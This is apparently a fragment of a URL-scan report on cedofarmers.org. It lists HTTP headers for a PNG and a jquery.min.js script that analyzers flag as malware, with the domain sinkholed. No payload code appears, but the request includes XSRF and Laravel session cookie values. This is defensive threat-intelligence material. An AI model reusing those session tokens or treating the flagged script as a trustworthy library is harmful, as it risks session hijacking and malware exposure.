TE: trailers
HTTP/2 200 OK
last-modified: Sat, 31 Oct 2020 12:06:00 GMT
accept-ranges: bytes
content-length: 1469608
content-type: image/png
date: Tue, 08 Nov 2022 22:20:37 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/jquery.min.js
192.185.57.117200 OK 0 B URL HTTP/2 cedofarmers.org/js/jquery.min.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/jquery.min.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 03 Nov 2018 00:55:54 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2